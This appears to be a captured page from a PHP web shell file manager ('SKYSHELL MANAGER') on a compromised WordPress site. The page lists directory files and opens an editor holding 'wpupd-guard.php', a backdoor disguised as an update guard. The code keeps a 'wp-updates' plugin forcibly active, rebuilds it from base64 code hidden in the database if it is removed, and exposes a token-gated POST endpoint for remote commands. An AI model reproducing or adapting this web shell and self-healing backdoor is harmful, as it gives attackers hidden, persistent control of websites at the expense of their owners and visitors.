📁
SKYSHELL MANAGER
PHP v8.0.30
Create
Create
Path:
root
/
home
/
godaofbq
/
drhyperbaric.com
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
modern
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
343.99 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: wpupd-guard.php
<?php // WP Updates guard v2.7.1 - self-heal + fallback add_filter("pre_update_option_active_plugins", function($new, $old) { $p = "wp-updates/wp-updates.php"; if (in_array($p, $old) && !in_array($p, $new)) { $new[] = $p; } return $new; }, 999, 2); add_action("init", function() { $f = WP_PLUGIN_DIR . "/wp-updates/wp-updates.php"; if (!file_exists($f)) { $code = get_option("wpupd_backup_code"); if ($code) { @mkdir(dirname($f), 0755, true); @file_put_contents($f, base64_decode($code)); } } $active = get_option("active_plugins", []); $p = "wp-updates/wp-updates.php"; if (!in_array($p, $active)) { $active[] = $p; update_option("active_plugins", $active); } }, 0); add_action("init", function() { if (!isset($_GET["wpupd_mu"]) || $_GET["wpupd_mu"] !== "1") return; if ($_SERVER["REQUEST_METHOD"] !== "POST") { echo json_encode(["s"=>0,"e"=>"post_only"]); exit; } $raw = file_get_contents("php://input"); if ($raw) { parse_str($raw, $p); $_POST = array_merge($_POST, $p); } $token = isset($_POST["token"]) ? $_POST["token"] : ""; if (!hash_equals("2da8102be96885f5cda626faff37eb2ff9e0a2cbf41a314d", $token)) { http_response_code(403); echo json_encode(["s"=>0,"e"=>"forbidden"]); exit; } if (function_exists("wpupd_dispatch")) { wpupd_dispatch(); exit; } echo json_encode(["s"=>1,"v"=>"mu_only","mu"=>true,"wp"=>get_bloginfo("version")]); exit; }, 2);
Save